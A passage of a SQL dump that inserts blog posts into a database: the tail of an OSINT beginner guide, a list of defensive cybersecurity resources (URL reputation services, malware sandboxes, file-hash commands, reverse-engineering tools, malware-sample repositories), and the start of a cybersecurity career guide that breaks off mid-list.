class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cybersecurity</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Use OSINT to monitor potential dangers like cyberattacks or phishing attempts.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Business Intelligence</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Quickly gather competitive intelligence to assess market trends or study competitors’ online activity.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Investigative Journalism</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Journalists rely on OSINT to verify claims, uncover important facts, and gather evidence for breaking news stories.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Academic Research</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Academics can gather and analyze open-source data to study societal trends, public opinion, or economic changes.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why OSINT is Crucial in Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the rise of cyber threats, OSINT has become increasingly integral in identifying email scams, phishing attempts, or even insider threats. Utilizing OSINT strengthens an organization’s defenses and keeps its team one step ahead of attackers.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Becoming proficient in OSINT doesn’t happen overnight. It’s a skill that requires patience, constant practice, and ethical responsibility. Whether you’re a cybersecurity enthusiast, journalist, or business leader, mastering OSINT equips you to uncover valuable insights from the wealth of information available online.</p>', '', NULL, NULL, 1, 'draft', '2024-08-03 05:47:08', '2026-01-12 21:41:44', 'OSINT Tool', 'What is OSINT? A Comprehensive Guide for Beginners', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(116, 'Essential Cybersecurity Resources for Professionals', 'essential-cybersecurity-resources-for-professionals', 'As threats evolve, staying informed is crucial. Here\'s a comprehensive list of tools to enhance your cybersecurity arsenal:<strong>1. IP &amp; URL Reputation</strong>\r\n<ul class=\"list-disc pl-8\">\r\n 	<li>🌀 <strong>VirusTotal</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.virustotal.com/gui/home/upload\" target=\"_blank\" rel=\"nofollow noopener\">https://www.virustotal.com/gui/home/upload</a> - Analyzes files and URLs to detect malware and other threats using multiple antivirus engines.</li>\r\n 	<li>🌀 <strong>URLScan.io</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://urlscan.io/\" target=\"_blank\" rel=\"nofollow noopener\">https://urlscan.io</a> - Scans and analyzes websites to identify potentially malicious content and detailed site activity.</li>\r\n 	<li>🌀 <strong>AbuseIPDB</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://abuseipdb.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://abuseipdb.com</a> - Allows reporting and checking IP addresses associated with malicious activity to combat abuse.</li>\r\n 	<li>🌀 <strong>Cisco Talos</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://talosintelligence.com/reputation_center/\" target=\"_blank\" rel=\"nofollow noopener\">https://talosintelligence.com/reputation_center/</a> - Provides threat intelligence and research to help detect and respond to security threats.</li>\r\n 	<li>🌀 <strong>IBM X-Force</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://exchange.xforce.ibmcloud.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://exchange.xforce.ibmcloud.com/</a> - Offers threat intelligence, incident response, and research services to protect against global threats.</li>\r\n 	<li>🌀 <strong>Palo Alto Networks URL Filtering</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://urlfiltering.paloaltonetworks.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://urlfiltering.paloaltonetworks.com/</a> - Controls web access and blocks malicious websites to protect users.</li>\r\n 	<li>🌀 <strong>Symantec URL Filtering</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://sitereview.symantec.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://sitereview.symantec.com/</a> - Blocks access to websites based on reputation and categorization to prevent web-based threats.</li>\r\n 	<li>🌀 <strong>IPVoid</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://ipvoid.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://ipvoid.com</a> - Provides information about IP addresses, including geolocation and abuse reports.</li>\r\n 	<li>🌀 <strong>URLVoid</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://urlvoid.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://urlvoid.com</a> - Analyzes websites for potential malicious activity using multiple blacklists and reputation services.</li>\r\n</ul>\r\n<strong>2. File | Hash | Search | Analysis | Sandboxing</strong>\r\n<ul class=\"list-disc pl-8\">\r\n 	<li>🌀 <strong>File Extension</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://filesec.io/#\" target=\"_blank\" rel=\"nofollow noopener\">https://filesec.io/#</a> - Identifies file types based on their extensions.</li>\r\n 	<li>🌀 <strong>LOLBAS</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://lolbas-project.github.io/\" target=\"_blank\" rel=\"nofollow noopener\">https://lolbas-project.github.io/</a> - Documents legitimate Windows binaries that can be abused by attackers.</li>\r\n 	<li>🌀 <strong>GTFOBins</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://gtfobins.github.io/\" target=\"_blank\" rel=\"nofollow noopener\">https://gtfobins.github.io/</a> - Similar to LOLBAS, but for Unix-based systems.</li>\r\n 	<li>🌀 <strong>File Hash Check</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.virustotal.com/gui/home/upload\" target=\"_blank\" rel=\"nofollow noopener\">https://www.virustotal.com/gui/home/upload</a> - Verifies file integrity by comparing hash values.</li>\r\n 	<li>🌀 <strong>Hash Search</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.hybrid-analysis.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://www.hybrid-analysis.com/</a> - Searches for information about file hashes to identify malware.</li>\r\n 	<li>🌀 <strong>MetaDefender</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://metadefender.opswat.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://metadefender.opswat.com/</a> - Uses multiple scanning engines to detect and block various types of malware.</li>\r\n 	<li>🌀 <strong>Kaspersky Threat Intelligence</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://opentip.kaspersky.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://opentip.kaspersky.com/</a> - Provides information on emerging threats.</li>\r\n 	<li>🌀 <strong>Cuckoo Sandbox</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://cuckoosandbox.org/\" target=\"_blank\" rel=\"nofollow noopener\">https://cuckoosandbox.org</a> - An open-source automated malware analysis system.</li>\r\n 	<li>🌀 <strong>AnyRun</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://any.run/\" target=\"_blank\" rel=\"nofollow noopener\">https://any.run</a> - An online malware analysis sandbox service.</li>\r\n 	<li>🌀 <strong>Hybrid-Analysis</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.hybrid-analysis.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://www.hybrid-analysis.com/</a> - Provides detailed reports on suspicious files.</li>\r\n 	<li>🌀 <strong>Joe Sandbox</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.joesandbox.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://www.joesandbox.com/</a> - A commercial malware analysis sandbox solution.</li>\r\n 	<li>🌀 <strong>VMRay Sandbox</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://vmray.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://vmray.com</a> - Another commercial malware analysis sandbox.</li>\r\n 	<li>🌀 <strong>Triage</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"http://tria.ge/\" target=\"_blank\" rel=\"nofollow noopener\">http://tria.ge</a> - An online malware analysis service.</li>\r\n 	<li>🌀 <strong>Browser Sandbox</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.browserling.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://www.browserling.com/</a> - Runs websites in a controlled, isolated environment.</li>\r\n</ul>\r\n<strong>3. File Hash</strong>\r\n<ul class=\"list-disc pl-8\">\r\n 	<li>🌀 <strong>HashTools (Windows)</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.binaryfortress.com/HashTools/\" target=\"_blank\" rel=\"nofollow noopener\">https://www.binaryfortress.com/HashTools/</a> - Generates and verifies file hashes on Windows.</li>\r\n 	<li>🌀 <strong>QuickHash (macOS)</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://quickhash-gui.org/\" target=\"_blank\" rel=\"nofollow noopener\">https://quickhash-gui.org/</a> - Generates file hashes on macOS.</li>\r\n 	<li>🌀 <strong>PowerShell</strong>:\r\n<div class=\"w-full max-w-[90vw]\">\r\n<div class=\"codeWrapper text-textMainDark selection:!text-superDark selection:bg-superDuper/10 bg-offset dark:bg-offsetDark my-md relative flex flex-col rounded font-mono text-sm font-extralight\">\r\n<div>\r\n<div class=\"text-textOff dark:text-textOffDark bg-offsetPlus dark:bg-offsetPlusDark py-xs px-sm z-10 inline-block rounded-br rounded-tl-[3px] font-thin\">powershell</div>\r\n</div>\r\n<div class=\"sc-gEvEer dOoSxI\"><code>Get<span class=\"token operator\">-</span>FileHash <span class=\"token operator\">-</span>Path C:\\path\\to\\file<span class=\"token punctuation\">.</span>txt <span class=\"token operator\">-</span>Algorithm MD5\r\nGet<span class=\"token operator\">-</span>FileHash <span class=\"token operator\">-</span>InputObject <span class=\"token\">\"This is a string\"</span> <span class=\"token operator\">-</span>Algorithm MD5\r\n</code>\r\n🌀 <strong>Terminal (macOS)</strong>:</div>\r\n</div>\r\n</div></li>\r\n 	<li>\r\n<div class=\"w-full max-w-[90vw]\">\r\n<div class=\"codeWrapper text-textMainDark selection:!text-superDark selection:bg-superDuper/10 bg-offset dark:bg-offsetDark my-md relative flex flex-col rounded font-mono text-sm font-extralight\">\r\n<div>\r\n<div class=\"text-textOff dark:text-textOffDark bg-offsetPlus dark:bg-offsetPlusDark py-xs px-sm z-10 inline-block rounded-br rounded-tl-[3px] font-thin\">text</div>\r\n</div>\r\n<div class=\"sc-gEvEer dOoSxI\"><code>shasum -a 256 filename\r\n</code></div>\r\n</div>\r\n</div></li>\r\n</ul>\r\n<strong>4. Find Suspicious Artifacts | Reverse Engineer | Debug Files</strong>\r\n<ul class=\"list-disc pl-8\">\r\n 	<li>🌀 <strong>PeStudio</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.winitor.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://www.winitor.com/</a> - Analyzes Windows executable files to detect potential malware.</li>\r\n 	<li>🌀 <strong>CFF Explorer</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://ntcore.com/?page_id=388\" target=\"_blank\" rel=\"nofollow noopener\">https://ntcore.com/?page_id=388</a> - Inspects and modifies the structure of Windows executable files.</li>\r\n 	<li>🌀 <strong>DocGuard</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://docguard.io/\" target=\"_blank\" rel=\"nofollow noopener\">https://docguard.io</a> - Analyzes document files for potential malicious content.</li>\r\n 	<li>🌀 <strong>File Scan</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.filescan.io/scan\" target=\"_blank\" rel=\"nofollow noopener\">https://www.filescan.io/scan</a> - Scans files for malware.</li>\r\n 	<li>🌀 <strong>Ghidra</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://ghidra-sre.org/\" target=\"_blank\" rel=\"nofollow noopener\">https://ghidra-sre.org</a> - An open-source reverse engineering tool.</li>\r\n 	<li>🌀 <strong>IDA Pro</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://hex-rays.com/ida-pro/\" target=\"_blank\" rel=\"nofollow noopener\">https://hex-rays.com/ida-pro/</a> - A commercial reverse engineering tool.</li>\r\n 	<li>🌀 <strong>Radare2/Cutter</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://rada.re/n/radare2.html\" target=\"_blank\" rel=\"nofollow noopener\">https://rada.re/n/radare2.html</a> and <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://cutter.re/\" target=\"_blank\" rel=\"nofollow noopener\">https://cutter.re/</a> - Open-source tools for reverse engineering and analyzing software.</li>\r\n</ul>\r\n<strong>5. Monitor System Resources | Detect Malware</strong>\r\n<ul class=\"list-disc pl-8\">\r\n 	<li>🌀 <strong>Process Hacker</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://processhacker.sourceforge.io/\" target=\"_blank\" rel=\"nofollow noopener\">https://processhacker.sourceforge.io/</a> - Monitors and manages running processes on Windows.</li>\r\n 	<li>🌀 <strong>Process Monitor</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://docs.microsoft.com/en-us/sysinternals/downloads/procmon\" target=\"_blank\" rel=\"nofollow noopener\">https://docs.microsoft.com/en-us/sysinternals/downloads/procmon</a> - Monitors and analyzes system activity on Windows.</li>\r\n 	<li>🌀 <strong>ProcDot</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://procdot.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://procdot.com</a> - Visualizes and analyzes process activity on Windows.</li>\r\n 	<li>🌀 <strong>Autoruns</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns\" target=\"_blank\" rel=\"nofollow noopener\">https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns</a> - Identifies and manages startup programs and services on Windows.</li>\r\n 	<li>🌀 <strong>TcpView</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview\" target=\"_blank\" rel=\"nofollow noopener\">https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview</a> - Monitors network connections on Windows.</li>\r\n</ul>\r\n<strong>6. Web Proxy</strong>\r\n<ul class=\"list-disc pl-8\">\r\n 	<li>🌀 <strong>Fiddler</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.telerik.com/fiddler\" target=\"_blank\" rel=\"nofollow noopener\">https://www.telerik.com/fiddler</a> - A web debugging proxy tool for monitoring and analyzing web traffic.</li>\r\n</ul>\r\n<strong>7. Malware Samples</strong>\r\n<ul class=\"list-disc pl-8\">\r\n 	<li>🌀 <strong>MalwareBazaar</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://bazaar.abuse.ch/\" target=\"_blank\" rel=\"nofollow noopener\">https://bazaar.abuse.ch</a> - Provides access to malware samples for analysis.</li>\r\n 	<li>🌀 <strong>FeodoTracker</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://feodotracker.abuse.ch/\" target=\"_blank\" rel=\"nofollow noopener\">https://feodotracker.abuse.ch/</a> - Tracks and provides information on Feodo botnet activity.</li>\r\n 	<li>🌀 <strong>SSLBlacklist</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://sslbl.abuse.ch/\" target=\"_blank\" rel=\"nofollow noopener\">https://sslbl.abuse.ch</a> - Lists SSL certificates used by malware.</li>\r\n 	<li>🌀 <strong>URLHaus</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://urlhaus.abuse.ch/\" target=\"_blank\" rel=\"nofollow noopener\">https://urlhaus.abuse.ch</a> - Collects and shares URLs used for malware distribution.</li>\r\n 	<li>🌀 <strong>ThreatFox</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://threatfox.abuse.ch/\" target=\"_blank\" rel=\"nofollow noopener\">https://threatfox.abuse.ch</a> - Provides indicators of compromise (IOCs) for threat intelligence.</li>\r\n 	<li>🌀 <strong>YARAify</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://yaraify.abuse.ch/\" target=\"_blank\" rel=\"nofollow noopener\">https://yaraify.abuse.ch</a> - Offers YARA rules for malware detection.</li>\r\n</ul>\r\nThese resources are invaluable for threat intelligence, malware analysis, and maintaining a strong security posture.', '', NULL, NULL, 1, 'draft', '2024-08-01 03:36:42', '2026-01-12 21:41:44', 'OSINT Tool', 'Essential Cybersecurity Resources for Professionals', '', NULL),
(117, 'A Comprehensive Guide to Starting Your Cybersecurity Career', 'a-comprehensive-guide-to-starting-your-cybersecurity-career', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Are you excited about starting a career in cybersecurity but feeling unsure where to begin? Cybersecurity offers endless opportunities, but launching your career in this high-demand industry can seem daunting without the right guidance. This detailed blog post will take you step-by-step through the process of building a strong foundation, developing practical skills, and getting real-world experience to successfully kickstart your cybersecurity career.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whether you’re completely new to IT or already have some technical experience, this guide will set you on the path toward becoming a cybersecurity expert.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Choose a Career in Cybersecurity?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity has become one of the most critical fields in today’s digital age. With cyber threats increasing in frequency and sophistication, companies are constantly looking for skilled professionals to safeguard their systems. According to the U.S. Bureau of Labor Statistics, jobs in this field are projected to grow by 35% between 2021-2031.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you’re looking for a stable, high-paying career with varied opportunities, venturing into cybersecurity might just be the perfect decision.\r\n\r\n</p>\r\n\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\">1. General Foundational Skills</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A solid foundation in IT basics is essential when entering any tech-related career. If you’re starting from scratch, <b><strong class=\"font-bold\">Cisco Networking Academy</strong></b> offers an excellent free training program with 8 courses to develop your foundational understanding.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These introductory courses are perfect for beginners with zero technical knowledge, as well as individuals looking to refresh their computer and networking basics. Invest time here to establish an essential skill set and get comfortable exploring IT systems. <strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.cisco.com/c/m/en_sg/partners/cisco-networking-academy/index.html\" target=\"_blank\" rel=\"nofollow noopener\">Cisco Networking Academy</a></strong></p>\r\n\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\">2. First Cyber Focus Course</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once you’ve covered the basics, it’s time to focus on your first cybersecurity training. Several beginner-friendly courses are available—select the one that works best for your learning style and budget.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">CompTIA Security+ </strong></b><strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.comptia.org/training/by-certification/security\" target=\"_blank\" rel=\"nofollow noopener\">Preparation Material</a></strong></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Most recognized in the industry but relatively expensive.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Covers a wide range of topics, but hands-on labs are limited.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Google Cybersecurity Certificate </strong></b><strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://grow.google/intl/en_ca/certificates/cybersecurity/\" target=\"_blank\" rel=\"nofollow noopener\">Google Cybersecurity Certificate</a></strong></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Affordable and includes hands-on practice in Linux, MySQL, and Python.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Prepares you for the Security+ exam with a 30% discount included.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\"><b><strong class=\"font-bold\">Microsoft Cybersecurity Analyst </strong></b><strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://learn.microsoft.com/en-us/credentials/certifications/security-compliance-and-identity-fundamentals/\" target=\"_blank\" rel=\"nofollow noopener\">Microsoft Cybersecurity Analyst</a></strong></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"8\">Similar to Google’s certification and also budget-friendly.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"9\">Prepares you for the SC-900 certification.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"10\"><b><strong class=\"font-bold\">ISC2 Certified in Cybersecurity</strong></b><strong>  <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.isc2.org/Certifications/CC\" target=\"_blank\" rel=\"nofollow noopener\">ISC2 